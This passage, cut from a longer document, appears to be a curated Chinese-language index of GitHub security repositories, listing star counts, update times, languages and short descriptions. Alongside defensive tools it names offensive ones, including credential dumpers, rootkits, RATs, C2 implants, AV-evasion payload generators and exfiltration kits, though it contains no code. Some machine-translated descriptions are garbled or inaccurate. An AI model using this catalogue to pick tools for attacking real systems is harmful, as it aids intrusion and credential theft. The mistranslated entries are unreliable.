[andreyvit/create-dmg](https://github.com/andreyvit/create-dmg) 用于构建精美DMG的Shell脚本\n- [**793**星][2m] [Go] [dreddsa5dies/gohacktools](https://github.com/dreddsa5dies/gohacktools) Golang编写的多款Hacking工具\n- [**786**星][1y] [PS] [kevin-robertson/invoke-thehash](https://github.com/kevin-robertson/invoke-thehash) 执行 pass the hash WMI 和 SMB 任务的PowerShell函数\n- [**783**星][26d] [Go] [bishopfox/sliver](https://github.com/bishopfox/sliver) 一个通用的跨平台植入程序框架,该框架C3支持Mutual-TLS,HTTP(S)和DNS\n- [**770**星][13d] [C++] [shekyan/slowhttptest](https://github.com/shekyan/slowhttptest) 应用层DoS攻击模拟器\n- [**770**星][18d] [C++] [snort3/snort3](https://github.com/snort3/snort3) 下一代Snort IPS(入侵防御系统)。\n- [**761**星][1y] [Py] [greatsct/greatsct](https://github.com/greatsct/greatsct) 生成绕过常见防病毒解决方案和应用程序白名单解决方案的metasploit payload\n- [**760**星][11d] [HTML] [m4cs/babysploit](https://github.com/m4cs/babysploit) 渗透测试工具包,旨在使您轻松学习如何使用更大,更复杂的框架(例如Metasploit)\n- [**743**星][1y] [C#] [eladshamir/internal-monologue](https://github.com/eladshamir/internal-monologue) 在不接触LSASS的情况下提取NTLM hash\n- [**742**星][6m] [Go] [talkingdata/owl](https://github.com/talkingdata/owl) 企业级分布式监控告警系\n- [**731**星][2d] [Go] [gruntwork-io/cloud-nuke](https://github.com/gruntwork-io/cloud-nuke) 通过检查(删除)其中的所有资源来清理云帐户\n- [**731**星][1m] [C] [iaik/zombieload](https://github.com/iaik/zombieload) ZombieLoad攻击PoC\n- [**729**星][2m] [Py] [shawndevans/smbmap](https://github.com/shawndevans/smbmap) SMB枚举\n- [**728**星][6m] [Go] [anshumanbh/git-all-secrets](https://github.com/anshumanbh/git-all-secrets) 结合多个开源 git 搜索工具实现的代码审计工具\n- [**723**星][6d] [Py] [skelsec/pypykatz](https://github.com/skelsec/pypykatz) 纯Python实现的Mimikatz\n- [**720**星][1y] [C#] [p3nt4/powershdll](https://github.com/p3nt4/powershdll) 使用rundll32执行PowerShell,绕过软件限制\n- [**716**星][6m] [Py] [adamlaurie/rfidiot](https://github.com/adamlaurie/rfidiot) python RFID / NFC library & tools\n- [**715**星][21d] [Py] [f-secure/see](https://github.com/f-secure/see) 在安全环境中构建测试自动化的框架\n- [**703**星][2m] [Py] [mjg59/python-broadlink](https://github.com/mjg59/python-broadlink) Python模块,用于控制Broadlink RM2 / 3(Pro)遥控器、A1传感器平台和SP2 / 3智能插头\n- [**695**星][3m] [netflix/security-bulletins](https://github.com/netflix/security-bulletins) Security Bulletins that relate to Netflix Open Source\n- [**693**星][7m] [Py] [mr-un1k0d3r/powerlessshell](https://github.com/mr-un1k0d3r/powerlessshell) 依靠MSBuild.exe远程执行PowerShell脚本和命令\n- [**686**星][3m] [Go] [pquerna/otp](https://github.com/pquerna/otp) 一次性密码工具,Golang编写\n- [**683**星][1y] [PS] [arvanaghi/sessiongopher](https://github.com/Arvanaghi/SessionGopher) 使用WMI为远程访问工具(如WinSCP,PuTTY,SuperPuTTY,FileZilla和Microsoft远程桌面)提取保存的会话信息。PowerShell编写\n- [**682**星][1m] [ptresearch/attackdetection](https://github.com/ptresearch/attackdetection) 搜索新的漏洞和0day,进行服现并创建PoC exp,以了解这些安全漏洞的工作方式,以及如何在网络层上检测到相关的攻击\n- [**679**星][1y] [Py] [endgameinc/rta](https://github.com/endgameinc/rta) 根据MITER ATT&CK进行建模,针对恶意tradecraft测试其检测功能。脚本框架\n- [**679**星][5d] [C#] [ghostpack/rubeus](https://github.com/ghostpack/rubeus) 原始Kerberos交互和滥用,C#编写\n- [**665**星][6m] [Py] [golismero/golismero](https://github.com/golismero/golismero) 安全测试框架,当前主要是Web安全,可轻松扩展到其他扫描\n- [**665**星][12m] [C#] [wwillv/godofhacker](https://github.com/wwillv/godofhacker) 由各种顶级黑客技术结合而成,基本功能覆盖面广,可满足大多数人的基本需求\n- [**656**星][6m] [PHP] [l3m0n/bypass_disable_functions_shell](https://github.com/l3m0n/bypass_disable_functions_shell) 一个各种方式突破Disable_functions达到命令执行的shell\n- [**647**星][3m] [Py] [gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins) 有关攻击Jenkins服务器的笔记\n- [**639**星][10m] [Py] [dirkjanm/privexchange](https://github.com/dirkjanm/privexchange) 通过滥用Exchange交换您对Domain Admin privs的特权\n- [**635**星][1y] [JS] [alcuadrado/hieroglyphy](https://github.com/alcuadrado/hieroglyphy) 将所有JavaScript代码转换为等价的()[] {}!+字符序列!,可在浏览器中运行\n- [**630**星][5m] [ankane/secure_rails](https://github.com/ankane/secure_rails) Rails安全最佳实战\n- [**621**星][1m] [Go] [evilsocket/arc](https://github.com/evilsocket/arc) 可用于管理私密数据的工具. 后端是 Go 语言编写的 RESTful 服务器, 前台是Html + JavaScript\n- [**605**星][30d] [Py] [webrecorder/pywb](https://github.com/webrecorder/pywb) 重放和记录Web存档\n- [**601**星][4d] [YARA] [didierstevens/didierstevenssuite](https://github.com/didierstevens/didierstevenssuite) 工具、脚本列表\n- [**601**星][17d] [C] [mrexodia/titanhide](https://github.com/mrexodia/titanhide) 用于隐藏某些进程调试器的驱动程序\n- [**599**星][2m] [PS] [ramblingcookiemonster/powershell](https://github.com/ramblingcookiemonster/powershell) 各种PowerShell函数和脚本\n- [**588**星][11m] [C] [justinsteven/dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood) 跨站点脚本编写者的演示和教程,这些站点编写者不能很好地堆积缓冲区溢出,并且也想做其他事情\n- [**583**星][10m] [Py] [romanz/amodem](https://github.com/romanz/amodem) 使用简单的耳机在两台计算机之间传输文件,实现真正的气密通信(通过扬声器和麦克风)或音频电缆(以提高传输速度)\n- [**582**星][1y] [C#] [tyranid/dotnettojscript](https://github.com/tyranid/dotnettojscript) 创建从内存中加载.NET v2程序集的JScript文件\n- [**580**星][5m] [Py] [nidem/kerberoast](https://github.com/nidem/kerberoast) 一系列用于攻击MS Kerberos实现的工具\n- [**570**星][1y] [Solidity] [crytic/not-so-smart-contracts](https://github.com/crytic/not-so-smart-contracts) 常见的以太坊智能合约漏洞示例,包括来自真实智能合约的代码。\n- [**567**星][4m] [Py] [its-a-feature/apfell](https://github.com/its-a-feature/apfell) 利用python3,docker,docker-compose和Web浏览器UI构建的跨平台,后渗透的Red Team框架。\n- [**557**星][1m] [C] [vanhauser-thc/thc-ipv6](https://github.com/vanhauser-thc/thc-ipv6) IPv6攻击工具包\n- [**550**星][6m] [HCL] [coalfire-research/red-baron](https://github.com/coalfire-research/red-baron) 为Red Teams自动创建有弹性,disposable,安全和敏捷的基础架构。\n- [**542**星][9m] [C] [hfiref0x/upgdsed](https://github.com/hfiref0x/upgdsed) 通用PG和DSE禁用工具\n- [**539**星][3m] [C] [eliasoenal/multimon-ng](https://github.com/EliasOenal/multimon-ng) multimon-ng是multimon的继承者。解码多种数字传输模式\n- [**537**星][1y] [C#] [ghostpack/safetykatz](https://github.com/ghostpack/safetykatz) Mimikatz和 .NET PE Loader的结合\n- [**531**星][13d] [Go] [sensepost/gowitness](https://github.com/sensepost/gowitness) Go 语言编写的网站快照工具\n- [**526**星][5d] [Ruby] [hdm/mac-ages](https://github.com/hdm/mac-ages) 确定IEEE分配的硬件地址范围的大概发布日期\n- [**520**星][2m] [Shell] [trailofbits/twa](https://github.com/trailofbits/twa) 小型网页审计工具,可灵活设置参数\n- [**517**星][2m] [JS] [mr-un1k0d3r/thundershell](https://github.com/mr-un1k0d3r/thundershell) 通过HTTP请求进行通信的C#RAT\n- [**517**星][5m] [C++] [shuax/greenchrome](https://github.com/shuax/greenchrome) 超好用的Chrome浏览器增强软件\n- [**516**星][8m] [Visual Basic .NET] [mr-un1k0d3r/maliciousmacrogenerator](https://github.com/mr-un1k0d3r/maliciousmacrogenerator) 生成混淆的宏,可进行AV /沙箱逃逸\n- [**510**星][12m] [Go] [mthbernardes/gtrs](https://github.com/mthbernardes/gtrs) 使用Google翻译器作为代理将任意命令发送到受感染的计算机\n- [**505**星][12m] [C] [google/ktsan](https://github.com/google/ktsan) 用于Linux内核的快速数据竞赛检测器\n- [**503**星][1m] [JS] [sindresorhus/public-ip](https://github.com/sindresorhus/public-ip) 快速获取外网IP地址\n- [**501**星][2m] [C] [m0nad/diamorphine](https://github.com/m0nad/diamorphine) 适用于Linux Kernels 2.6.x / 3.x / 4.x(x86和x86_64)的LKM rootkit\n- [**500**星][11m] [C] [yangyangwithgnu/bypass_disablefunc_via_ld_preload](https://github.com/yangyangwithgnu/bypass_disablefunc_via_ld_preload) 通过LD_PRELOA绕过disable_functions(不需要/ usr / sbin / sendmail)\n- [**495**星][3m] [PHP] [nzedb/nzedb](https://github.com/nzedb/nzedb) 自动扫描Usenet,类似于爬虫扫描互联网的方式\n- [**492**星][3m] [Go] [gen2brain/cam2ip](https://github.com/gen2brain/cam2ip) 将任何网络摄像头转换为IP 摄像机\n- [**488**星][2m] [Py] [aoii103/darknet_chinesetrading](https://github.com/aoii103/darknet_chinesetrading) 暗网中文网监控实时爬虫\n- [**488**星][3m] [Go] [gorilla/csrf](https://github.com/gorilla/csrf) 为Go Web应用程序和服务提供CSRF预防中间件\n- [**487**星][12m] [Go] [evanmiller/hecate](https://github.com/evanmiller/hecate) Hex编辑器\n- [**486**星][11m] [Shell] [craigz28/firmwalker](https://github.com/craigz28/firmwalker) 一个简单的bash脚本,用于搜索提取或安装的固件文件系统。\n- [**478**星][1m] [xiangpasama/jdsrc-small-classroom](https://github.com/xiangpasama/jdsrc-small-classroom) 京东SRC小课堂系列文章\n- [**478**星][2m] [TS] [mitre-attack/attack-navigator](https://github.com/mitre-attack/attack-navigator) 提供ATT&CK矩阵的基本导航和注释的Web App\n- [**472**星][2m] [Py] [bit4woo/teemo](https://github.com/bit4woo/teemo) 域名和电子邮件地址收集工具\n- [**469**星][20d] [Py] [fportantier/habu](https://github.com/fportantier/habu) Python 编写的网络工具工具包,主要用于教学/理解网络攻击中的一些概念\n- [**468**星][2m] [Py] [coleifer/micawber](https://github.com/coleifer/micawber) 用于从URL中提取丰富的内容库\n- [**467**星][1m] [Shell] [wireghoul/graudit](https://github.com/wireghoul/graudit) 简单的脚本和签名集,进行源代码审计\n- [**465**星][2m] [Go] [gen0cide/gscript](https://github.com/gen0cide/gscript) 基于运行时参数,动态安装恶意软件\n- [**462**星][5m] [C] [phoenhex/files](https://github.com/phoenhex/files) Phoenhex 团队的exploits/POCs/presentation\n- [**461**星][3m] [PS] [rvrsh3ll/misc-powershell-scripts](https://github.com/rvrsh3ll/misc-powershell-scripts) PowerShell工具集\n- [**454**星][19d] [PS] [mr-un1k0d3r/redteampowershellscripts](https://github.com/mr-un1k0d3r/redteampowershellscripts) 在红队练习中可能会有用的各种PowerShell脚本\n- [**454**星][2m] [Py] [super-l/superl-url](https://github.com/super-l/superl-url) 根据关键词,对搜索引擎内容检索结果的网址内容进行采集的一款轻量级软程序。 程序主要运用于安全渗透测试项目,以及批量评估各类CMS系统0DAY的影响程度,同时也是批量采集自己获取感兴趣的网站的一个小程序~~ 可自动从搜索引擎采集相关网站的真实地址与标题等信息,可保存为文件,自动去除重复URL。同时,也可以自定义忽略多条域名等。\n- [**450**星][4m] [C++] [omerya/invisi-shell](https://github.com/omerya/invisi-shell) 隐藏您的Powershell脚本。绕过所有Powershell安全功能\n- [**431**星][7m] [Pascal] [mojtabatajik/robber](https://github.com/mojtabatajik/robber) 查找易于发生DLL劫持的可执行文件\n- [**431**星][11d] [C++] [tenable/routeros](https://github.com/tenable/routeros) 对 MikroTik的RouterOS进行安全性研究时使用的各种工具和漏洞\n- [**421**星][8m] [7kbstorm/7kbscan-webpathbrute](https://github.com/7kbstorm/7kbscan-webpathbrute) 路径暴力探测工具\n- [**420**星][11m] [Py] [powerscript/katanaframework](https://github.com/powerscript/katanaframework) 用于进行渗透测试的框架,基于一个简单而全面的结构,任何人都可以使用,修改和共享。Python编写\n- [**411**星][5d] [HTML] [w3c/webappsec](https://github.com/w3c/webappsec) Web App安全工作组\n- [**411**星][15d] [Py] [ytisf/pyexfil](https://github.com/ytisf/pyexfil) 用于数据渗透的Python包\n- [**409**星][10m] [Py] [linklayer/pyvit](https://github.com/linklayer/pyvit) 与汽车接口的工具包。它旨在实现汽车系统中使用的通用硬件接口和协议。\n- [**408**星][2d] [Go] [cloudfoundry/gorouter](https://github.com/cloudfoundry/gorouter) CF Router\n- [**401**星][1m] [Py] [fbngrm/matroschka](https://github.com/fbngrm/Matroschka) Python隐写术工具,可在图像中红隐藏文本或图像\n- [**391**星][12d] [C++] [simsong/bulk_extractor](https://github.com/simsong/bulk_extractor) 取证工具\n- [**389**星][24d] [Ruby] [david942j/seccomp-tools](https://github.com/david942j/seccomp-tools) 用于seccomp分析\n- [**386**星][4m] [PHP] [msurguy/honeypot](https://github.com/msurguy/honeypot) 一种简单有效的方法,来阻止某些进入您网站的垃圾邮件机器人\n- [**384**星][11d] [C#] [bloodhoundad/sharphound](https://github.com/bloodhoundad/sharphound) C#重写BloodHound Ingestor\n- [**383**星][1y] [JS] [empireproject/empire-gui](https://github.com/empireproject/empire-gui) Empire开渗透框架的图形界面\n- [**383**星][1m] [JS] [nccgroup/tracy](https://github.com/nccgroup/tracy) 查找web app中所有的sinks and sources, 并以易于理解的方式显示这些结果\n- [**381**星][1m] [Py] [fox-it/bloodhound.py](https://github.com/fox-it/bloodhound.py) 基于Python的BloodHound Ingestor,基于Impacket\n- [**379**星][9m] [Py] [k4m4/onioff](https://github.com/k4m4/onioff) url检测器,深度检测网页链接\n- [**376**星][2d] [Ruby] [dradis/dradis-ce](https://github.com/dradis/dradis-ce) 面向信息安全团队的协作框架\n- [**376**星][7m] [Py] [tidesec/tidefinger](https://github.com/tidesec/tidefinger) 指纹识别小工具,汲取整合了多个web指纹库,结合了多种指纹检测方法,让指纹检测更快捷、准确。\n- [**375**星][] [C] [vanhauser-thc/aflplusplus](https://github.com/vanhauser-thc/aflplusplus) 带社区补丁的afl 2.56b\n- [**375**星][6m] [Py] [vysecurity/domlink](https://github.com/vysecurity/DomLink) 一种将具有注册组织名称和电子邮件的域链接到其他域的工具。\n- [**369**星][2m] [Py] [emtunc/slackpirate](https://github.com/emtunc/slackpirate) Slack枚举和提取工具-从Slack工作区中提取敏感信息\n- [**367**星][20d] [Shell] [trimstray/otseca](https://github.com/trimstray/otseca) 安全审计工具, 搜索并转储系统配置\n- [**364**星][1m] [Py] [tenable/poc](https://github.com/tenable/poc) 漏洞PoC\n- [**363**星][2m] [Py] [codingo/interlace](https://github.com/codingo/interlace) 轻松将单线程命令行应用程序转换为具有CIDR和glob支持的快速,多线程应用程序。\n- [**363**星][11m] [Py] [secynic/ipwhois](https://github.com/secynic/ipwhois) 检索和解析IPv4和IPv6地址的Whois数据\n- [**359**星][4d] [C#] [sonarsource/sonar-dotnet](https://github.com/sonarsource/sonar-dotnet) 用于C#和VB.NET语言的静态代码分析器,用作SonarQube和SonarCloud平台的扩展。\n- [**356**星][7d] [TeX] [vlsergey/infosec](https://github.com/vlsergey/infosec) MIPT无线电工程与控制系统部信息保护教科书\n- [**356**星][21d] [hackerschoice/thc-tesla-powerwall2-hack](https://github.com/hackerschoice/thc-tesla-powerwall2-hack) TESLA PowerWall 2安全雪茄\n- [**355**星][19d] [Py] [lockgit/hacking](https://github.com/lockgit/hacking) Hacking工具收集\n- [**355**星][5m] [Makefile] [xdite/internet-security](https://github.com/xdite/internet-security) 互联网资安风控实战\n- [**347**星][7d] [Ruby] [sunitparekh/data-anonymization](https://github.com/sunitparekh/data-anonymization) 帮助您构建匿名的生产数据转储,可用于性能测试,安全性测试,调试和开发。\n- [**346**星][19d] [Perl] [keydet89/regripper2.8](https://github.com/keydet89/regripper2.8) 从注册表中提取/解析信息(键,值,数据)并将其呈现出来进行分析。\n- [**344**星][1y] [Assembly] [egebalci/amber](https://github.com/egebalci/amber) 反射式PE加壳器,用于绕过安全产品和缓解措施\n- [**343**星][2m] [veracode-research/solr-injection](https://github.com/veracode-research/solr-injection) Apache Solr注入研究\n- [**342**星][9m] [Py] [skorov/ridrelay](https://github.com/skorov/ridrelay) 通过使用具有低priv的SMB中继来枚举您没有信誉的域上的用户名。\n- [**340**星][11d] [C#] [mr-un1k0d3r/scshell](https://github.com/mr-un1k0d3r/scshell) Fileless lateral movement tool that relies on ChangeServiceConfigA to run command\n- [**339**星][4d] [JS] [meituan-dianping/lyrebird](https://github.com/meituan-dianping/lyrebird) 基于拦截以及模拟HTTP/HTTPS网络请求的面向移动应用的插件化测试工作台\n- [**339**星][1y] [Ruby] [srcclr/commit-watcher](https://github.com/srcclr/commit-watcher) Find interesting and potentially hazardous commits in git projects\n- [**335**星][4m] [C] [csete/gpredict](https://github.com/csete/gpredict) a real time satellite tracking and orbit prediction program\nfor the Linux desktop\n- [**332**星][11m] [C#] [ghostpack/sharpdump](https://github.com/ghostpack/sharpdump) SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.\n- [**332**星][1y] [Py] [leapsecurity/inspy](https://github.com/leapsecurity/InSpy) A python based LinkedIn enumeration tool\n- [**331**星][1y] [Shell] [1n3/goohak](https://github.com/1n3/goohak) Automatically Launch Google Hacking Queries Against A Target Domain\n- [**328**星][1y] [Java] [ysrc/liudao](https://github.com/ysrc/liudao) “六道”实时业务风控系统\n- [**327**星][3m] [Py] [defaultnamehere/cookie_crimes](https://github.com/defaultnamehere/cookie_crimes) Read local Chrome cookies without root or decrypting\n- [**326**星][2m] [PS] [joelgmsec/autordpwn](https://github.com/joelgmsec/autordpwn) The Shadow Attack Framework\n- [**326**星][1y] [JS] [nccgroup/wssip](https://github.com/nccgroup/wssip) 服务器和客户端之间通信时自定义 WebSocket 数据的捕获、修改和发送。\n- [**326**星][1m] [Go] [wangyihang/platypus](https://github.com/wangyihang/platypus) A modern multiple reverse shell sessions/clients manager via terminal written in go\n- [**325**星][21d] [Shell] [al0ne/linuxcheck](https://github.com/al0ne/linuxcheck) linux信息收集/应急响应/常见后门检测脚本\n- [**324**星][12d] [JS] [privacypass/challenge-bypass-extension](https://github.com/privacypass/challenge-bypass-extension) 用于匿名认证的浏览器扩展\n- [**323**星][1m] [trustedsec/physical-docs](https://github.com/trustedsec/physical-docs) This is a collection of legal wording and documentation used for physical security assessments. The goal is to hopefully allow this as a template for other companies to use and to protect themselves when conducting physical security assessments.\n- [**322**星][1y] [crazywa1ker/darthsidious-chinese](https://github.com/crazywa1ker/darthsidious-chinese) 从0开始你的域渗透之旅\n- [**318**星][2m] [Visual Basic .NET] [nccgroup/vcg](https://github.com/nccgroup/vcg) Code security scanning tool.\n- [**317**星][5d] [Py] [circl/lookyloo](https://github.com/circl/lookyloo) Lookyloo is a web interface allowing to scrape a website and then displays a tree of domains calling each other.\n- [**316**星][22d] [HTML] [vanhauser-thc/thc-archive](https://github.com/vanhauser-thc/thc-archive) All releases of the security research group (a.k.a. hackers) The Hacker's Choice\n- [**315**星][6d] [VBA] [itm4n/vba-runpe](https://github.com/itm4n/vba-runpe) A VBA implementation of the RunPE technique or how to bypass application whitelisting.\n- [**315**星][8m] [C] [tomac/yersinia](https://github.com/tomac/yersinia) layer 2 攻击框架\n- [**315**星][1y] [Go] [benjojo/bgp-battleships](https://github.com/benjojo/bgp-battleships) Play battleships using BGP\n- [**313**星][2m] [Py] [coalfire-research/slackor](https://github.com/coalfire-research/slackor) A Golang implant that uses Slack as a command and control server\n- [**312**星][7m] [C] [pmem/syscall_intercept](https://github.com/pmem/syscall_intercept) Linux系统调用拦截框架,通过 hotpatching 进程标准C库的机器码实现。\n- [**312**星][5m] [Java] [shengqi158/fastjson-remote-code-execute-poc](https://github.com/shengqi158/fastjson-remote-code-execute-poc) 直接用intellij IDEA打开即可 首先编译得到Test.class,然后运行Poc.java\n- [**311**星][7m] [HTML] [nccgroup/crosssitecontenthijacking](https://github.com/nccgroup/crosssitecontenthijacking) Content hijacking proof-of-concept using Flash, PDF and Silverlight\n- [**311**星][1m] [YARA] [needmorecowbell/hamburglar](https://github.com/needmorecowbell/hamburglar) collect useful information from urls, directories, and files\n- [**310**星][2m] [PS] [darkoperator/posh-secmod](https://github.com/darkoperator/posh-secmod) PowerShell Module with Security cmdlets for security work\n- [**309**星][4m] [PS] [enigma0x3/misc-powershell-stuff](https://github.com/enigma0x3/misc-powershell-stuff) random powershell goodness\n- [**305**星][3m] [C] [9176324/shark](https://github.com/9176324/shark) Turn off PatchGuard in real time for win7 (7600) ~ win10 (18950).\n- [**305**星][7d] [ugvf2009/miles](https://github.com/ugvf2009/miles) 二爷翻墙,专注翻墙30年,但没有掌握核心科技^_^\n- [**305**星][11d] [Py] [xinsss/conf-for-surge-shadowrocket](https://github.com/xinsss/conf-for-surge-shadowrocket) Surge Shadowrocket conf\n- [**304**星][2m] [JS] [doyensec/electronegativity](https://github.com/doyensec/electronegativity) Electronegativity is a tool to identify misconfigurations and security anti-patterns in Electron applications.\n- [**300**星][] [C++] [squalr/squally](https://github.com/squalr/squally) 2D Platformer Game for Teaching Game Hacking - C++/cocos2d-x\n- [**300**星][1m] [C] [tarsnap/scrypt](https://github.com/tarsnap/scrypt) The scrypt key derivation function was originally developed for use in the Tarsnap online backup system and is designed to be far more secure against hardware brute-force attacks than alternative functions such as PBKDF2 or bcrypt.\n- [**299**星][10m] [C++] [anhkgg/superdllhijack](https://github.com/anhkgg/superdllhijack) SuperDllHijack:A general DLL hijack technology, don't need to manually export the same function interface of the DLL, so easy! 一种通用Dll劫持技术,不再需要手工导出Dll的函数接口了\n- [**299**星][1y] [C#] [ghostpack/sharpup](https://github.com/ghostpack/sharpup) SharpUp is a C# port of various PowerUp functionality.\n- [**298**星][7m] [Py] [edent/bmw-i-remote](https://github.com/edent/bmw-i-remote) A reverse engineered interface for the BMW i3 Electric Car\n- [**298**星][14d] [Shell] [fdiskyou/zines](https://github.com/fdiskyou/zines) Mirror of my favourite hacking Zines for the lulz, nostalgy, and reference\n- [**297**星][10d] [JS] [jesusprubio/strong-node](https://github.com/jesusprubio/strong-node) \n- [**297**星][1y] [JS] [xxxily/fiddler-plus](https://github.com/xxxily/fiddler-plus) 自定义的Fiddler规则,多环境切换、解决跨域开发、快速调试线上代码必备|高效调试分析利器\n- [**296**星][9m] [C] [gianlucaborello/libprocesshider](https://github.com/gianlucaborello/libprocesshider) Hide a process under Linux using the ld preloader (\n- [**295**星][2m] [Go] [mdsecactivebreach/o365-attack-toolkit](https://github.com/mdsecactivebreach/o365-attack-toolkit) A toolkit to attack Office365\n- [**295**星][9m] [C] [rhboot/shim](https://github.com/rhboot/shim) a trivial EFI application that, when run, attempts to open and execute another application\n- [**292**星][9d] [Go] [cruise-automation/fwanalyzer](https://github.com/cruise-automation/fwanalyzer) a tool to analyze filesystem images for security\n- [**292**星][2m] [C] [mboehme/aflfast](https://github.com/mboehme/aflfast) AFLFast (extends AFL with Power Schedules)\n- [**292**星][2d] [Py] [vulnerscom/api](https://github.com/vulnerscom/api) Python 2/3 library for the Vulners Database\n- [**290**星][20d] [C#] [matterpreter/offensivecsharp](https://github.com/matterpreter/offensivecsharp) Collection of Offensive C# Tooling\n- [**290**星][5m] [Py] [opsdisk/pagodo](https://github.com/opsdisk/pagodo) pagodo (Passive Google Dork) - Automate Google Hacking Database scraping\n- [**288**星][12m] [Py] [justicerage/ffm](https://github.com/justicerage/ffm) Freedom Fighting Mode: open source hacking harness\n- [**287**星][3m] [Py] [apache/incubator-spot](https://github.com/apache/incubator-spot) Mirror of Apache Spot\n- [**283**星][16d] [PS] [nullbind/powershellery](https://github.com/nullbind/powershellery) This repo contains Powershell scripts used for general hackery.\n- [**282**星][3m] [Py] [hacktoolspack/hack-tools](https://github.com/hacktoolspack/hack-tools) hack tools\n- [**282**星][4m] [Py] [joxeankoret/pyew](https://github.com/joxeankoret/pyew) Official repository for Pyew.\n- [**282**星][13d] [PHP] [nico3333fr/csp-useful](https://github.com/nico3333fr/csp-useful) Collection of scripts, thoughts about CSP (Content Security Policy)\n- [**282**星][1y] [HTML] [googleprojectzero/p0tools](https://github.com/googleprojectzero/p0tools) Project Zero Docs and Tools\n- [**278**星][5d] [geerlingguy/ansible-role-security](https://github.com/geerlingguy/ansible-role-security) Ansible Role - Security\n- [**277**星][5m] [Py] [18f/domain-scan](https://github.com/18f/domain-scan) A lightweight pipeline, locally or in Lambda, for scanning things like HTTPS, third party service use, and web accessibility.\n- [**277**星][8m] [s0md3v/mypapers](https://github.com/s0md3v/mypapers) Repository for hosting my research papers\n- [**276**星][28d] [C#] [mkaring/confuserex](https://github.com/mkaring/confuserex) An open-source, free protector for .NET applications\n- [**274**星][4m] [Py] [invernizzi/scapy-http](https://github.com/invernizzi/scapy-http) Support for HTTP in Scapy\n- [**273**星][15d] [Py] [den1al/jsshell](https://github.com/den1al/jsshell) An interactive multi-user web JS shell\n- [**271**星][8m] [offensive-security/nethunter-lrt](https://github.com/offensive-security/nethunter-lrt) The Nethunter Linux Root Toolkit is a collection of bash scripts which install Nethunter onto a supported device.\n- [**271**星][8m] [Py] [s0md3v/breacher](https://github.com/s0md3v/Breacher) An advanced multithreaded admin panel finder written in python.\n- [**269**星][18d] [Py] [ledger-donjon/lascar](https://github.com/ledger-donjon/lascar) Ledger's Advanced Side-Channel Analysis Repository\n- [**269**星][5d] [JS] [nodejs/security-wg](https://github.com/nodejs/security-wg) Node.js Security Working Group\n- [**265**星][5d] [C] [eua/wxhexeditor](https://github.com/eua/wxhexeditor) wxHexEditor official GIT repo\n- [**265**星][1y] [PS] [fox-it/invoke-aclpwn](https://github.com/fox-it/invoke-aclpwn) \n- [**264**星][11m] [Py] [ant4g0nist/susanoo](https://github.com/ant4g0nist/susanoo) A REST API security testing framework.\n- [**264**星][t] [C++] [fransbouma/injectablegenericcamerasystem](https://github.com/fransbouma/injectablegenericcamerasystem) This is a generic camera system to be used as the base for cameras for taking screenshots within games. The main purpose of the system is to hijack the in-game 3D camera by overwriting values in its camera structure with our own values so we can control where the camera is located, it's pitch/yaw/roll values, its FoV and the camera's look vector.\n- [**264**星][9m] [C] [landhb/hideprocess](https://github.com/landhb/hideprocess) A basic Direct Kernel Object Manipulation rootkit that removes a process from the EPROCESS list, hiding it from the Task Manager\n- [**264**星][1y] [JS] [roccomuso/netcat](https://github.com/roccomuso/netcat) Netcat client and server modules written in pure Javascript for Node.j\n- [**263**星][25d] [Py] [guimaizi/get_domain](https://github.com/guimaizi/get_domain) 域名收集与监测\n- [**263**星][1m] [Ruby] [rapid7/recog](https://github.com/rapid7/recog) Pattern recognition for hosts, services, and content\n- [**262**星][4m] [C] [portcullislabs/linikatz](https://github.com/portcullislabs/linikatz) UNIX版本的Mimikatz\n- [**262**星][] [rustsec/advisory-db](https://github.com/rustsec/advisory-db) Security advisory database for Rust crates published through crates.io\n- [**262**星][6d] [Py] [sofianehamlaoui/lockdoor-framework](https://github.com/sofianehamlaoui/lockdoor-framework) \n- [**260**星][12m] [Py] [hysnsec/devsecops-studio](https://github.com/hysnsec/DevSecOps-Studio) DevSecOps Distribution - Virtual Environment to learn DevSecOps\n- [**259**星][10d] [C++] [poweradminllc/paexec](https://github.com/poweradminllc/paexec) Remote execution, like PsExec\n- [**258**星][1y] [Py] [m4ll0k/galileo](https://github.com/m4ll0k/galileo) Galileo - Web Application Audit Framework\n- [**257**星][1m] [Py] [frint0/email-enum](https://github.com/frint0/email-enum) Email-Enum searches mainstream websites and tells you if an email is registered! #DEPRECATED\n- [**257**星][10m] [C] [p0f/p0f](https://github.com/p0f/p0f) p0f unofficial git repo\n- [**255**星][1m] [Py] [cloudflare/python-cloudflare](https://github.com/cloudflare/python-cloudflare) Python wrapper for the Cloudflare Client API v4\n- [**254**星][7m] [Go] [lavalamp-/ipv666](https://github.com/lavalamp-/ipv666) IPV6地址枚举工具. Go编写\n- [**254**星][10m] [Py] [wh0ale/src-experience](https://github.com/wh0ale/src-experience) 工欲善其事,必先利其器\n- [**252**星][3m] [Py] [cvandeplas/pystemon](https://github.com/cvandeplas/pystemon) Monitoring tool for PasteBin-alike sites written in Python. Inspired by pastemon\n- [**252**星][7m] [Py] [itskindred/procspy](https://github.com/itskindred/procspy) Python tool that monitors and logs user-run commands on a Linux system for either offensive or defensive purposes..\n- [**252**星][1m] [Py] [rvrsh3ll/findfrontabledomains](https://github.com/rvrsh3ll/findfrontabledomains) Search for potential frontable domains\n- [**250**星][9m] [C] [jakeajames/rootlessjb](https://github.com/jakeajames/rootlessjb) \n- [**249**星][19d] [Py] [cisco-config-analysis-tool/ccat](https://github.com/cisco-config-analysis-tool/ccat) Cisco Config Analysis Tool\n- [**248**星][8d] [Py] [susmithkrishnan/torghost](https://github.com/SusmithKrishnan/torghost) Tor anonimizer\n- [**246**星][8m] [ethicalhack3r/wordpress_plugin_security_testing_cheat_sheet](https://github.com/ethicalhack3r/wordpress_plugin_security_testing_cheat_sheet) WordPress插件安全测试备忘录。\n- [**246**星][1y] [xcsh/unity-game-hacking](https://github.com/xcsh/unity-game-hacking) A guide for hacking unity games\n- [**244**星][9m] [Py] [mazen160/bfac](https://github.com/mazen160/bfac) 自动化 web app 备份文件测试工具,可检测备份文件是否会泄露 web app 源代码\n- [**244**星][8m] [Py] [openstack/syntribos](https://github.com/openstack/syntribos) 自动化的 API 安全测试工具\n- [**242**星][19d] [Rust] [hirrolot/anevicon](https://github.com/Hirrolot/anevicon) \n- [**239**星][1y] [Py] [matthewclarkmay/geoip-attack-map](https://github.com/matthewclarkmay/geoip-attack-map) Cyber security geoip attack map that follows syslog and parses IPs/port numbers to visualize attackers in real time.\n- [**238**星][2m] [JS] 